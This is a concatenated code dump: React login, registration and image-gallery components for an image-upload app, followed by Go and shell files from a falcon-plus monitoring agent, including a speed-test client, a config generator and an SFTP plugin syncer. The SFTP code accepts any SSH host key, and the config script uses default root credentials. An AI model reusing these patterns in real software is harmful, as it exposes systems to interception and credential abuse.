"https://mern-image-upload.herokuapp.com/api/v1/user/image/server/" ); setserverData(serverRes.data); }; let deleteimage = async (id) => { await axios.delete( `https://mern-image-upload.herokuapp.com/api/v1/user/delete/image/${id}` ); history.push("/accessusers"); }; return ( <div className="container"> <div className="row"> {serverData.length === 0 ? ( <p>loading..</p> ) : ( serverData.map((images) => { return ( <div className="col-md-4 mt-4" key={images._id}> <div className={`${style.card_group} card-group`}> <div className="card "> <img src={images.uploadimages} className="card-img-top" alt="..." /> <div className="card-body " style={{ backgroundColor: "black", color: "white" }} > <div className="socialmedia_row d-flex "> <p> { <IconButton className="text-white" onClick={() => handellike(images._id)} data-bs-toggle="tooltip" data-bs-placement="bottom" title="Like" > <FavoriteBorderIcon /> </IconButton> } </p> <p> { <IconButton className="text-white"> <SendIcon /> </IconButton> } </p> <p> { <IconButton className={`${style.deletebtn} text-white`} onClick={() => deleteimage(images._id)} data-bs-toggle="tooltip" data-bs-placement="bottom" title="Delete" > <DeleteForeverIcon /> </IconButton> } </p> <p className="ml-auto"> { <IconButton className="text-white"> <BookmarkBorderIcon /> </IconButton> } </p> </div> <div className={`${style.image_footer}`}> <small style={{ position: "relative", top: "-18px" }}> {images.likes} likes </small> <br /> <div className={`${style.comment_area}`}> <small> <strong>{images.name} :- </strong> {images.comments} </small> <br /> <small style={{ fontSize: "10px" }}> {new Date(images.createdAt).toLocaleString()} </small> </div> </div> </div> </div> </div> </div> ); }) )} </div> </div> ); } export default Displayimage; <file_sep>import React, { useState, useContext } from "react"; import axios from "axios"; import Usercontext from "../Context/Usercontext"; import { useHistory } from "react-router-dom"; import style from "./Register.module.css"; import "../../node_modules/bootstrap/dist/css/bootstrap.min.css"; import network from "../Asserts/Network.png"; import validator from "validator"; import Errorhandel from '../Errorhandel' import backgroundimage from "../Asserts/backgroundimage.png"; function Register() { const [name, setname] = useState(); const [email, setemail] = useState(); const [password, setpassword] = useState(); const [confirmpassword, setconfirmpassword] = useState(); const [errorMessage, setErrorMessage] = useState(""); const [Error,setError]=useState() const histroy = useHistory(); const handel_login = () => { histroy.push("/login"); }; const { setuserData } = useContext(Usercontext); const handelsubmit = async (e) => { e.preventDefault(); try { await axios.post("https://mern-image-upload.herokuapp.com/api/v1/user/post/data/", { name: name, email: email, password: <PASSWORD>, confirmpassword:<PASSWORD> }); const userRes = await axios.post( "https://mern-image-upload.herokuapp.com/api/v1/user/login", { email, password, } ); console.log(userRes); setuserData({ token: userRes.data.token, userName: userRes.data.user.name, userEmail:userRes.data.user.email }); window.localStorage.setItem("auth-token", userRes.data.token); histroy.push("/accessuser/*"); } catch (error) { // serError(error.Response.msg) // to log the (arror.response ) to see your data in the console, the error send a response from backend error.response.data.msg && setError( error.response.data.msg) } }; const handelpassword = (e) => { setpassword(e.target.value); if ( validator.isStrongPassword(e.target.value, { minLength: 5, minLowercase: 1, minUppercase: 1, minNumbers: 1, minSymbols: 1, }) ) { setErrorMessage("Is Strong Password"); } else { setErrorMessage("Is Not Strong Password"); } }; return ( <> <header className={`${style.header}`}> <div className="row"> <div className={`col-sm-6 ${style.leftside_container}`}> <img src={backgroundimage} className="img-fluid" alt="backgroundimage" /> </div> <div className="col-md-4 ml-5" style={{height:"auto"}}> <img src={network} alt="sad network" className="my-3" width="200px" /> {Error && <Errorhandel message={Error} clearError={() => setError(undefined)}/>} <form onSubmit={handelsubmit}> <h3 className="py-2" style={{textShadow:"2px 3px 3px rgb(180, 192, 192)"}}><strong>Create an accound</strong></h3> <div className="mb-3 mt-4"> <label className="form-label"> <b>FullName</b> </label> <input type="text" className="form-control" name="name" placeholder="Enter your fullname" onChange={(e) => setname(e.target.value)} /> </div> <div className="mb-3 mt-4"> <label className="form-label"> <b>Email Address</b> </label> <input type="email" className="form-control" name="email" placeholder="Enter your email address" onChange={(e) => setemail(e.target.value)} aria-describedby="emailHelp" /> </div> <div className="mb-3 mt-4"> <label className="form-label"> <b>Password</b> </label> <input type="<PASSWORD>" className="form-control" name="password" placeholder="Enter password" onChange={handelpassword} /> </div> <div className="mb-3 mt-4"> <label className="form-label"> <b>Confirm password</b> </label> <input type="password" className="form-control" name="password" placeholder="Enter confirmpassword" onChange={(e) => setconfirmpassword(e.target.value)} /> </div> <p span style={{ fontWeight: "bold", color: "red", paddingLeft: "5px", fontSize: "15px", }} > {errorMessage} </p> <div className="mb-3 form-check"> <input type="checkbox" className="form-check-input" id="exampleCheck1" /> <label className="form-check-label" for="exampleCheck1"> I accept the Privacy Policy and the Terms of Service </label> </div> <button className={`${style.signin_btn}`} type="submit"> Signin </button> <p className="pt-3 pl-2"> Have an accound? <strong onClick={handel_login} className={`${style.loginbtn}`}> Login </strong> </p> <p style={{ fontSize: "15px" ,paddingBottom:"10px"}}> We'll never share your email with anyone else. </p> </form> </div> </div> </header> {/* media queary screen */} <div className={`${style.responsive_screen} `}> <p className={`${style.p}`}></p> <img src={network} alt="sad network" className="my-2" width="200px" /> <h3 className={`py-2 ${style.h3}`} style={{textShadow:"2px 3px 3px rgb(180, 192, 192)"}}>Create an accound</h3> {Error && <Errorhandel message={Error} clearError={() => setError(undefined)}/>} <form onSubmit={handelsubmit}> <div className="mb-3"> <label for="exampleInputEmail1" className="form-label"> <b>FullName</b> </label> <input type="text" id="exampleInputEmail1" className="form-control" name="name" placeholder="Enter your fullname" onChange={(e) => setname(e.target.value)} /> </div> <div className="mb-3"> <label for="exampleInputEmail1" className="form-label"> <b> Email address</b> </label> <input type="email" className="form-control" id="exampleInputEmail1" name="email" placeholder="Enter your email address" onChange={(e) => setemail(e.target.value)} aria-describedby="emailHelp" /> </div> <div className="mb-3 "> <label for="exampleInputPassword1" className="form-label"> <b>Password</b> </label> <input type="password" className="form-control" id="exampleInputPassword1" name="password" placeholder="Enter password" onChange={handelpassword} /> </div> <div className="mb-3"> <label className="form-label"> <b>Confirm password</b> </label> <input type="password" className="form-control" name="password" placeholder="Enter <PASSWORD>" onChange={(e) => setconfirmpassword(e.target.value)} /> </div> <p span style={{ fontWeight: "bold", color: "red", paddingLeft: "5px", fontSize: "15px", }} > {errorMessage} </p> <button className={`${style.signin_btn}`} type="submit"> Signin </button> <p className="pt-3 pl-2"> Have an accound? <strong onClick={handel_login} className={`${style.loginbtn}`}> Login </strong> </p> <p style={{ fontSize: "15px" ,paddingBottom:"10px"}}> We'll never share your email with anyone else. </p> </form> </div> {/* media queary screen */} </> ); } export default Register; <file_sep>import React from 'react' import CancelIcon from '@material-ui/icons/Cancel'; function Errorhandel(props) { return ( <div> <strong className="text-danger " >{props.message}</strong> <p onClick={props.clearError} style={{paddingLeft:"3px",cursor:"pointer",color:"red"}}> < CancelIcon/> </p> </div> ) } export default Errorhandel <file_sep>import React, { useState, useContext } from "react"; import { useHistory } from "react-router-dom"; import axios from "axios"; // import "../../node_modules/bootstrap/dist/css/bootstrap.css"; import "../../node_modules/bootstrap/dist/css/bootstrap.min.css"; import Usercontext from "../Context/Usercontext"; import Errorhandel from "../Errorhandel"; import style from "./Login.module.css"; import backgroundimage from "../Asserts/backgroundimage.png"; import network from "../Asserts/Network.png"; function Login() { const [email, setemail] = useState(); const [password, setpassword] = useState(); const [loginError, setloginError] = useState(); const history = useHistory(); const { setuserData } = useContext(Usercontext); const handel_signin = () => { history.push("/register"); }; const submit = async (e) => { e.preventDefault(); try { const userRes = await axios.post( "https://mern-image-upload.herokuapp.com/api/v1/user/login", { email, password, } ); setuserData({ token: userRes.data.token, userName: userRes.data.user.name, userEmail: userRes.data.user.email, }); window.localStorage.setItem("auth-token", userRes.data.token); history.push("/accessuser/*"); } catch (error) { error.response.data.passwordmsg && setloginError(error.response.data.passwordmsg); } }; return ( <> <header className={` ${style.header__container}`}> <div className="row"> <div className={`col-sm-1 ${style.top_position}`}>.</div> <div className={`col-md-3 ${style.login_form}`} style={{ marginTop: "10px" }} > <img src={network} alt="sad network" className="my-5" width="200px" /> <form onSubmit={submit}> {loginError && ( <Errorhandel message={loginError} clearError={() => setloginError(undefined)} /> )} <h3 className={`${style.form_header}`}>Login your accound</h3> <div className="mb-3 mt-3"> <label className="form-label"> <b>Email Address</b> </label> <input type="email" className="form-control" name="email" required placeholder="Enter email address" onChange={(e) => setemail(e.target.value)} aria-describedby="emailHelp" /> </div> <div className="mb-3"> <label className="form-label"> <b>Password</b> </label> <input type="password" required placeholder="Enter password" onChange={(e) => setpassword(e.target.value)} className="form-control" /> </div> <button className={`${style.login_btn}`} type="submit"> Login </button> <p className="pt-4 pb-2 "> Dont't have an accound? <strong onClick={handel_signin} style={{ cursor: "pointer", color: "red", paddingLeft: "5px", }} > Signin </strong> </p> </form> </div> <div className={`col-md-8 ${style.rightside_container}`}> <img src={backgroundimage} className="img-fluid" alt="backgroundimage" /> </div> </div> </header> {/* media queary screen */} <div className={`${style.responsive_screen}`}> <p className={`${style.p}`}></p> <img src={network} alt="sad network" className="my-3" width="200px" /> <h3 className={`${style.form_header}`}>Login your accound</h3> <form onSubmit={submit}> {loginError && ( <Errorhandel message={loginError} clearError={() => setloginError(undefined)} /> )} <div className="mb-3"> <label for="exampleInputEmail1" className="form-label"> Email address </label> <input type="email" className="form-control" id="exampleInputEmail1" placeholder="Enter email address" name="email" required onChange={(e) => setemail(e.target.value)} aria-describedby="emailHelp" /> </div> <div className="mb-3"> <label for="exampleInputPassword1" className="form-label"> Password </label> <input type="password" className="form-control" id="exampleInputPassword1" placeholder="Enter password" required onChange={(e) => setpassword(e.target.value)} /> </div> <button className={`${style.login_btn}`} type="submit"> Login </button> <p className="pt-4 pb-2 "> Dont't have an accound? <strong onClick={handel_signin} style={{ cursor: "pointer", color: "red", paddingLeft: "5px", }} > Signin </strong> </p> </form> </div> {/* media queary screen */} </> ); } export default Login;
eea7cb0c130baa949cca60160ef69c7a57e739ee
[ "JavaScript" ]
6
JavaScript
Jranjangudu/image-uploaded-clientsite
aee26cf90441361f0c26772fd3ba7569e356a312
e2d5358d5559a0bf8431ff3367db0a70e19d1136
refs/heads/master
<repo_name>liyongcun/falcon-plus<file_sep>/modules/agent/g/cfg.go // Copyright 2017 Xiaomi, Inc. // // Licensed under the Apache License, Version 2.0 (the "License"); // you may not use this file except in compliance with the License. // You may obtain a copy of the License at // // http://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to in writing, software // distributed under the License is distributed on an "AS IS" BASIS, // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. // See the License for the specific language governing permissions and // limitations under the License. package g import ( "encoding/json" "log" "os" "os/exec" "strings" "sync" "github.com/toolkits/file" ) type Ssh struct { Ip_addr string `json:"ip_addr"` Ip_port int `json:"ip_port"` User string `json:"user"` Password string `json:"<PASSWORD>"` Path string `json:"path"` PrivateKey string `json:"privatekey"` } type PluginConfig struct { Enabled bool `json:"enabled"` Dir string `json:"dir"` Ssh Ssh `json:"ssh"` LogDir string `json:"logs"` } type HeartbeatConfig struct { Enabled bool `json:"enabled"` Addr string `json:"addr"` Interval int `json:"interval"` Timeout int `json:"timeout"` } type TransferConfig struct { Enabled bool `json:"enabled"` Addrs []string `json:"addrs"` Interval int `json:"interval"` Timeout int `json:"timeout"` } type HttpConfig struct { Enabled bool `json:"enabled"` Listen string `json:"listen"` Backdoor bool `json:"backdoor"` } type CollectorConfig struct { IfacePrefix []string `json:"ifacePrefix"` MountPoint []string `json:"mountPoint"` } type Net_speed struct { IsServer bool `json:"isServer"` IsTest bool `json:"isTest"` BufLen string `json:"bufflength"` Duration int `json:"duration"` Threads int `json:"threads"` Port int `json:"port"` Interval int `json:"interval"` } type GlobalConfig struct { Debug bool `json:"debug"` Hostname string `json:"hostname"` IP string `json:"ip"` Hostname2ip bool `json:"hostname2ip"` Plugin *PluginConfig `json:"plugin"` Heartbeat *HeartbeatConfig `json:"heartbeat"` Transfer *TransferConfig `json:"transfer"` Http *HttpConfig `json:"http"` Collector *CollectorConfig `json:"collector"` DefaultTags map[string]string `json:"default_tags"` IgnoreMetrics map[string]bool `json:"ignore"` Net_speed *Net_speed `json:"net_speed"` } var ( ConfigFile string config *GlobalConfig lock = new(sync.RWMutex) ) func Config() *GlobalConfig { lock.RLock() defer lock.RUnlock() return config } func Hostname() (string, error) { if Config().Hostname2ip { return IP(), nil } hostname := Config().Hostname if hostname != "" { return hostname, nil } if os.Getenv("FALCON_ENDPOINT") != "" { hostname = os.Getenv("FALCON_ENDPOINT") return hostname, nil } hostname, err := os.Hostname() if err != nil { log.Println("ERROR: os.Hostname() fail", err) } hostname_bak := IP() if strings.Contains(hostname, "localhost") && len(hostname_bak) > 7 && hostname_bak != "127.0.0.1" { hostname = hostname_bak } return hostname, err } func Real_Hostname() (string, error) { hostname := Config().Hostname if hostname != "" { return hostname, nil } if os.Getenv("FALCON_ENDPOINT") != "" { hostname = os.Getenv("FALCON_ENDPOINT") return hostname, nil } hostname, err := os.Hostname() if err != nil { log.Println("ERROR: os.Hostname() fail", err) } hostname_bak := IP() if strings.Contains(hostname, "localhost") && len(hostname_bak) > 7 && hostname_bak != "127.0.0.1" { hostname = hostname_bak } return hostname, err } func IP() string { ip := Config().IP if ip != "" { // use ip in configuration return ip } if len(LocalIp) > 0 { ip = LocalIp } var host_ip string = "" out, err := exec.Command("hostname", "--all-ip-addresses").Output() if err == nil { ip_list := strings.Split(strings.Replace(string(out), "\n", "", -1), " ") for vv := range ip_list { if ip_list[vv] == "127.0.0.1" || ip_list[vv] == "::1" || strings.Contains(ip_list[vv], "localhost") || len(ip_list[vv]) < 5 { continue } host_ip = ip_list[vv] break } } else { log.Println("hostname --all-ip-addresses err" + err.Error()) } //log.Printf(" get system ip %s --- real ip %s",host_ip,ip) if (ip == "127.0.0.1" || ip == "::1" || ip == "localhost") && len(host_ip) > 1 { ip = host_ip } return ip } func ParseConfig(cfg string) { if cfg == "" { log.Fatalln("use -c to specify configuration file") } if !file.IsExist(cfg) { log.Fatalln("config file:", cfg, "is not existent. maybe you need `mv cfg.example.json cfg.json`") } ConfigFile = cfg configContent, err := file.ToTrimString(cfg) if err != nil { log.Fatalln("read config file:", cfg, "fail:", err) } var c GlobalConfig err = json.Unmarshal([]byte(configContent), &c) if err != nil { log.Fatalln("parse config file:", cfg, "fail:", err) } lock.Lock() defer lock.Unlock() config = &c log.Println("read config file:", cfg, "successfully") } <file_sep>/modules/agent/speedtest/client.go package speedtest // author liyc // 客户端只管发,然后发送结束标识,server返回结束标识,如果收到结束标识,标识收取完成,总的数据量=buff+flag_size*2 // 时间=(收到标识,time)-start //本期只支持client->server 模式 import ( log "github.com/Sirupsen/logrus" "github.com/open-falcon/falcon-plus/common/model" "github.com/open-falcon/falcon-plus/modules/agent/g" . "io/ioutil" "math" "net" "path/filepath" "strconv" "strings" "sync" "sync/atomic" "time" ) var data uint64 = 0 func runDurationTimer(d time.Duration, toStop chan int) { go func() { dSeconds := uint64(d.Seconds()) if dSeconds == 0 { return } time.Sleep(d) toStop <- 1 close(toStop) }() } func Client() { var wg sync.WaitGroup port := ":" + strconv.Itoa(g.Config().Net_speed.Port) buffersize := unitToNumber(g.Config().Net_speed.BufLen) for { var client_list []string log.Info(filepath.Join(g.Config().Plugin.Dir, "/ethr_client.txt")) if contents, err := ReadFile(filepath.Join(g.Config().Plugin.Dir, "/ethr_client.txt")); err == nil { client_list = strings.Split(string(contents), "\n") } else { log.Error("打开测试客户端列表的文件打开失败" + g.Config().Plugin.Dir + "/ethr_client.txt" + err.Error()) break } for vv := range client_list { if len(client_list[vv]) < 5 { log.Error("err client addr", client_list[vv]) continue } log.Info("client begin client ----------", client_list[vv]) startTime := time.Now() data = 0 log.Printf("client begin with %d threads", g.Config().Net_speed.Threads) toStop := make(chan int, 1) log.Debug("run time is ", g.Config().Net_speed.Duration) runDurationTimer(time.Duration(g.Config().Net_speed.Duration)*time.Second, toStop) for th := 0; th < g.Config().Net_speed.Threads; th++ { buff := make([]byte, buffersize) for i := uint64(0); i < buffersize; i++ { buff[i] = byte(i) } wg.Add(1) go func() { server := "[" + client_list[vv] + "]" + port log.Info("begin to test to " + server) conn, err := net.Dial("tcp", server) if err != nil { log.Fatalf("Could not connect: %s", err) } defer conn.Close() wg.Done() ExitForLoop: for { select { case <-toStop: log.Debug(" there is break") break ExitForLoop default: w, err := SendData(conn, buff) if err != nil { log.Printf("Error: %s", err) } else { atomic.AddUint64(&data, uint64(w)) } } } }() } //todo 发送消息 wg.Wait() usedtime := time.Since(startTime) ratio := float64(float64(data*8)/usedtime.Seconds()) / 1000.0 / 1000.0 log.Printf("---Throughput--: %fMib/s --- %d", ratio, data) mvs := model.MetricValue{ g.IP(), "network.test", math.Trunc(ratio), int64(g.Config().Net_speed.Interval), "GAUGE", g.IP() + "." + client_list[vv], time.Now().Unix()} var metrics []*model.MetricValue metrics = append(metrics, &mvs) g.SendToTransfer(metrics) time.Sleep(10 * time.Second) } time.Sleep(time.Duration(g.Config().Net_speed.Interval) * time.Second) } } <file_sep>/config/confgen.sh #!/bin/bash #特别说明,上部分为监听端口,如果sever主机部署,请修改对应的下面的addr的信息, # 例如tarsfer的监听为8433,则下面地址要对应修改 # ssh 的原路径,目标路径,需要为非“连接的路径,即软连接(ln)”,这点很重要,不然不能同步 confs=( #插件相关的信息 '%%PLUGIN_IP%%=127.0.0.1' #插件同步的ssh端口,一般为22号端口 '%%PLUGIN_PORT%%=22' #插件同步的ssh用户 '%%PLUGIN_USER%%=root' #插件同步的ssh密码,如果配置为key的模式,密码可以为空 '%%PLUGIN_PASSWD%%=root' # 插件的同步源地址 '%%PLUGIN_PATH%%=/root' #插件的ssh同步私有key,如果用key回话,则必须要填写 '%%SSH_PRIVATEKEY%%=' #/home/user/.ssh/rsa #监听端口,注意“0.0.0.0” #客户端监听ip地址,这个端口支持第三方数据,push到agent_http端口上,这个地址在前台写死的,建议不要修改, # 如果要修改,就需要修改前台的端口号 '%%AGENT_HTTP%%=0.0.0.0:1988' #集群合并信息的http的监听地址 '%%AGGREGATOR_HTTP%%=0.0.0.0:6055' #图的http监听地址 '%%GRAPH_HTTP%%=0.0.0.0:6071' #图的rpc监听地址 '%%GRAPH_RPC%%=0.0.0.0:6070' #心跳服务的http监听地址 '%%HBS_HTTP%%=0.0.0.0:6031' #心跳的rpc服务监听地址 '%%HBS_RPC%%=0.0.0.0:6030' #告警判断服务的http监听地址 '%%JUDGE_HTTP%%=0.0.0.0:6081' #告警判断服务的rpc监听地址 '%%JUDGE_RPC%%=0.0.0.0:6080' #空数据监控的http监听端口 '%%NODATA_HTTP%%=0.0.0.0:6090' #发送组件的http监听地址 '%%TRANSFER_HTTP%%=0.0.0.0:6060' #发送组件的rpc监听地址 '%%TRANSFER_RPC%%=0.0.0.0:8433' #API接口的http监听地址 '%%PLUS_API_HTTP%%=0.0.0.0:8080' #告警组件的http监听地址 '%%ALARM_HTTP%%=0.0.0.0:9912' #配置转发的gateway地址 '%%GATEWAY_HTTP%%=0.0.0.0:16060' '%%GATEWAY_RPC%%=0.0.0.0:18433' '%%GATEWAY_SOCKET%%=0.0.0.0:14444' #网络测速端口 '%%NET_SPEED_PORT%%=10009' #配置地址类 '%%HBS_ADDR%%=127.0.0.1:6030' '%%REDIS%%=127.0.0.1:6379' '%%TRANSFER_ADDR%%=127.0.0.1:8433' '%%MYSQL%%=root:@tcp(127.0.0.1:3306)' '%%PLUS_API_DEFAULT_TOKEN%%=default-token-used-in-server-side' '%%API_ADDR%%=127.0.0.1:8080' '%%DASHBOARD_HTTP%%=127.0.0.1:8081' #图的地址列表用逗号分隔,json的list格式,注意双引号 '%%GRAPH_ADDRS%%=127.0.0.1:6070' #如果有多台agent,则有多个地址,建议只有一个agent提供服务,如果有多个agent,则建议根据资源,带宽,选择填写一台 '%%PUSH_ADDR%%=127.0.0.1:1988' #tsdb地址,如果有发送到tsdb的需求,请修改transfer的配置文件,发送到tsdb, '%%TSDB_ADDR%%=127.0.0.1:8088' ) configurer() { for i in "${confs[@]}" do search="${i%%=*}" replace="${i##*=}" uname=`uname` if [ "$uname" == "Darwin" ] ; then # Note the "" and -e after -i, needed in OS X find ./*.json -type f -exec sed -i .tpl -e "s/${search}/${replace}/g" {} \; else find ./*.json -type f -exec sed -i "s#${search}#${replace}#g" {} \; fi done } init_db(){ #数据库初始化 # Falcon+ mysql_cmd=`which mysql` if [ ${#mysql_cmd} -lt 3 ] then echo "没有发现mysql命令,请手动执行数据库初始化" return else ip="127.0.0.1" port=3306 user="root" passwd="" for i in "${confs[@]}" do search="${i%%=*}" replace="${i##*=}" if [ ${search} == '%%MYSQL%%' ] then echo "mysql 信息如下: "+${replace} user=`echo ${replace}|awk -F':' '{print $1}'` passwd=`echo ${replace}|awk -F'@' '{print $1}'|awk -F':' '{print $2}'` ip=`echo ${replace}|awk -F'@' '{print $2}'|sed -e 's/tcp(//' -e 's/)//' |awk -F':' '{print $1}'` port=`echo ${replace}|awk -F'@' '{print $2}'|sed -e 's/tcp(//' -e 's/)//' |awk -F':' '{print $2}'` break else continue fi done mysql -h ${ip} -u ${user} -P ${port} -p ${passwd} < ../mysq/db_schema/1_uic-db-schema.sql mysql -h ${ip} -u ${user} -P ${port} -p ${passwd} < ../mysq/db_schema/2_portal-db-schema.sql mysql -h ${ip} -u ${user} -P ${port} -p ${passwd} < ../mysq/db_schema/3_dashboard-db-schema.sql mysql -h ${ip} -u ${user} -P ${port} -p ${passwd} < ../mysq/db_schema/4_graph-db-schema.sql mysql -h ${ip} -u ${user} -P ${port} -p ${passwd} < ../mysq/db_schema/5_alarms-db-schema.sql fi } configurer init_db<file_sep>/modules/agent/http/plugin.go // Copyright 2017 Xiaomi, Inc. // // Licensed under the Apache License, Version 2.0 (the "License"); // you may not use this file except in compliance with the License. // You may obtain a copy of the License at // // http://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to in writing, software // distributed under the License is distributed on an "AS IS" BASIS, // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. // See the License for the specific language governing permissions and // limitations under the License. package http import ( "fmt" log "github.com/Sirupsen/logrus" "github.com/golang/sftp" "github.com/open-falcon/falcon-plus/modules/agent/g" "github.com/open-falcon/falcon-plus/modules/agent/plugins" "github.com/toolkits/file" "golang.org/x/crypto/ssh" "io/ioutil" "net" "net/http" "os" "path/filepath" "strings" //"os/exec" "time" ) // TODO add by liyc 这里修改为sftp的模式,因为ssh是远程访问的核心 type Sftp_client struct { clientConfig *ssh.ClientConfig sshClient *ssh.Client sftpClient *sftp.Client pubkey ssh.AuthMethod } func (sshftp *Sftp_client) PublicKeyFile(keypath string) ssh.AuthMethod { if !file.IsExist(keypath) { return nil } buffer, err := ioutil.ReadFile(keypath) if err != nil { log.Debug("read ssh private file error" + err.Error()) return nil } key, err := ssh.ParsePrivateKey(buffer) if err != nil { log.Debug("ParsePrivateKey error" + err.Error()) return nil } return ssh.PublicKeys(key) } func (sshftp *Sftp_client) Sftp_close() { sshftp.sftpClient.Close() sshftp.sshClient.Close() } func (sshftp *Sftp_client) Connect_init() error { var err error = nil if len(g.Config().Plugin.Ssh.User) <= 0 { return fmt.Errorf("ssh user not defined!") } if len(g.Config().Plugin.Ssh.Ip_addr) <= 0 { return fmt.Errorf("ssh ip address not defined!") } if g.Config().Plugin.Ssh.Ip_port <= 0 { return fmt.Errorf("ssh ip port not defined!") } if len(g.Config().Plugin.Ssh.PrivateKey) <= 1 && len(g.Config().Plugin.Ssh.Password) <= 1 { return fmt.Errorf("ssh auth method not defined!,please use password or PrivateKey") } if len(g.Config().Plugin.Ssh.PrivateKey) >= 1 && len(g.Config().Plugin.Ssh.Password) >= 1 { log.Debug("ssh auth method password and PrivateKey both defined , PrivateKey default") } if len(g.Config().Plugin.Ssh.PrivateKey) > 1 { log.Debug("PrivateKey:" + g.Config().Plugin.Ssh.PrivateKey) sshftp.pubkey = sshftp.PublicKeyFile(g.Config().Plugin.Ssh.PrivateKey) } auth := make([]ssh.AuthMethod, 0) if sshftp.pubkey != nil { auth = append(auth, sshftp.pubkey) } else { auth = append(auth, ssh.Password(g.Config().Plugin.Ssh.Password)) } sshftp.clientConfig = &ssh.ClientConfig{ User: g.Config().Plugin.Ssh.User, Auth: auth, Timeout: 30 * time.Second, HostKeyCallback: func(hostname string, remote net.Addr, key ssh.PublicKey) error { return nil }, } // connet to ssh addr := fmt.Sprintf("%s:%d", g.Config().Plugin.Ssh.Ip_addr, g.Config().Plugin.Ssh.Ip_port) if sshftp.sshClient, err = ssh.Dial("tcp", addr, sshftp.clientConfig); err != nil { return err } // create sftp client if sshftp.sftpClient, err = sftp.NewClient(sshftp.sshClient); err != nil { return err } return nil } /* func configPluginRoutes() { http.HandleFunc("/plugin/update", func(w http.ResponseWriter, r *http.Request) { if !g.Config().Plugin.Enabled { w.Write([]byte("plugin not enabled")) return } dir := g.Config().Plugin.Dir parentDir := file.Dir(dir) file.InsureDir(parentDir) if file.IsExist(dir) { // git pull cmd := exec.Command("git", "pull") cmd.Dir = dir err := cmd.Run() if err != nil { w.Write([]byte(fmt.Sprintf("git pull in dir:%s fail. error: %s", dir, err))) return } } else { // git clone cmd := exec.Command("git", "clone", g.Config().Plugin.Git, file.Basename(dir)) cmd.Dir = parentDir err := cmd.Run() if err != nil { w.Write([]byte(fmt.Sprintf("git clone in dir:%s fail. error: %s", parentDir, err))) return } } w.Write([]byte("success")) }) http.HandleFunc("/plugin/reset", func(w http.ResponseWriter, r *http.Request) { if !g.Config().Plugin.Enabled { w.Write([]byte("plugin not enabled")) return } dir := g.Config().Plugin.Dir if file.IsExist(dir) { cmd := exec.Command("git", "reset", "--hard") cmd.Dir = dir err := cmd.Run() if err != nil { w.Write([]byte(fmt.Sprintf("git reset --hard in dir:%s fail. error: %s", dir, err))) return } } w.Write([]byte("success")) }) http.HandleFunc("/plugins", func(w http.ResponseWriter, r *http.Request) { //TODO: not thread safe RenderDataJson(w, plugins.Plugins) }) }*/ func sftp_get(reset_flag bool) (msg string, erra error) { dir := g.Config().Plugin.Dir parentDir := file.Dir(dir) file.InsureDir(parentDir) sshCli := Sftp_client{nil, nil, nil, nil} err := sshCli.Connect_init() if err != nil { return "open ssh fail", err } defer sshCli.Sftp_close() if file.IsExist(dir) { wl := sshCli.sftpClient.Walk(g.Config().Plugin.Ssh.Path) if err != nil { return fmt.Sprintf("update using ssh err in dir:%s fail. error: %s", dir, err), err } for wl.Step() { aRel, err := filepath.Rel(g.Config().Plugin.Ssh.Path, wl.Path()) if err != nil { return fmt.Sprintf("update using ssh get root path in dir:%s ,real path %s fail. error: %s", dir, wl.Path()), err } if aRel == "." || aRel == ".." { continue } //sftp文件信息 //log.Debug("ssh file:"+ wl.Path()) FileInfo, err := sshCli.sftpClient.Lstat(wl.Path()) if err != nil { return fmt.Sprintf("update using ssh get real path stat in :%s fail. error: %s", wl.Path(), err), err } lRpath := filepath.Join(dir, aRel) //log.Debug("ssh file: " + aRel + " ----- local file : " + lRpath) if strings.HasSuffix(aRel, ".pyc") { //.pyc 不同步,这个是运行后的二进制文件, continue } if FileInfo.Mode()&os.ModeSymlink != 0 { //创建软连接 link, _ := sshCli.sftpClient.ReadLink(wl.Path()) os.Symlink(link, lRpath) continue } else if !FileInfo.IsDir() { //处理文件,比较时间 if file.IsExist(lRpath) { //本地文件信息 lfile, err := os.Lstat(lRpath) if err != nil { return fmt.Sprintf("get local file info err :%s fail. error: %s", lRpath, err), err } if lfile.ModTime().Unix() >= FileInfo.ModTime().Unix() && !reset_flag { continue } } //这里关闭文件采用显示关闭,不然文件过多,出现标准的linux 错误:too many open file,因为defer的特性 srcFile, err := sshCli.sftpClient.Open(wl.Path()) //defer srcFile.Close() if err != nil { return fmt.Sprintf("open ssh file err :%s fail. error: %s", lRpath, err), err } dstFile, err := os.Create(lRpath) //defer dstFile.Close() if err != nil { return fmt.Sprintf("open local file err :%s fail. error: %s", lRpath, err), err } if _, err = srcFile.WriteTo(dstFile); err != nil { return fmt.Sprintf("write to local file err :%s fail. error: %s", lRpath, err), err } dstFile.Chmod(FileInfo.Mode()) fe := srcFile.Close() if fe != nil { log.Error("close ssh file err ! ", fe.Error()) } de := dstFile.Close() if de != nil { log.Error("close local plugin file err ! ", de.Error()) } } else { file.InsureDir(lRpath) } } } else { log.Error("local plugin path [" + dir + "] not found") } return "Success", nil } func configPluginRoutes() { http.HandleFunc("/plugin/update", func(w http.ResponseWriter, r *http.Request) { if !g.Config().Plugin.Enabled { w.Write([]byte("plugin not enabled")) return } err_msg, err := sftp_get(false) if err != nil { w.Write([]byte("plugin not update : [" + err_msg + "-" + err.Error() + "]")) return } w.Write([]byte("success")) }) http.HandleFunc("/plugin/reset", func(w http.ResponseWriter, r *http.Request) { if !g.Config().Plugin.Enabled { w.Write([]byte("plugin not enabled")) return } err_msg, err := sftp_get(true) if err != nil { w.Write([]byte("plugin not reset: [" + err_msg + "-" + err.Error() + "]")) return } w.Write([]byte("success")) }) http.HandleFunc("/plugins", func(w http.ResponseWriter, r *http.Request) { //TODO: not thread safe RenderDataJson(w, plugins.Plugins) }) } <file_sep>/modules/agent/speedtest/speedtest.go package speedtest import ( "fmt" log "github.com/Sirupsen/logrus" "math" "net" "strconv" "strings" "sync/atomic" "time" "unicode" ) type BytesPerTime struct { Bytes uint64 Duration time.Duration } type UUID [16]byte var timeBase = time.Date(1582, time.October, 15, 0, 0, 0, 0, time.UTC).Unix() var hardwareAddr []byte var clockSeq uint32 func TimeUUID() UUID { return FromTime(time.Now()) } const ( // UNO represents 1 unit. UNO = 1 // KILO represents k. KILO = 1024 // MEGA represents m. MEGA = 1024 * 1024 // GIGA represents g. GIGA = 1024 * 1024 * 1024 // TERA represents t. TERA = 1024 * 1024 * 1024 * 1024 ) func unitToNumber(s string) uint64 { s = strings.TrimSpace(s) s 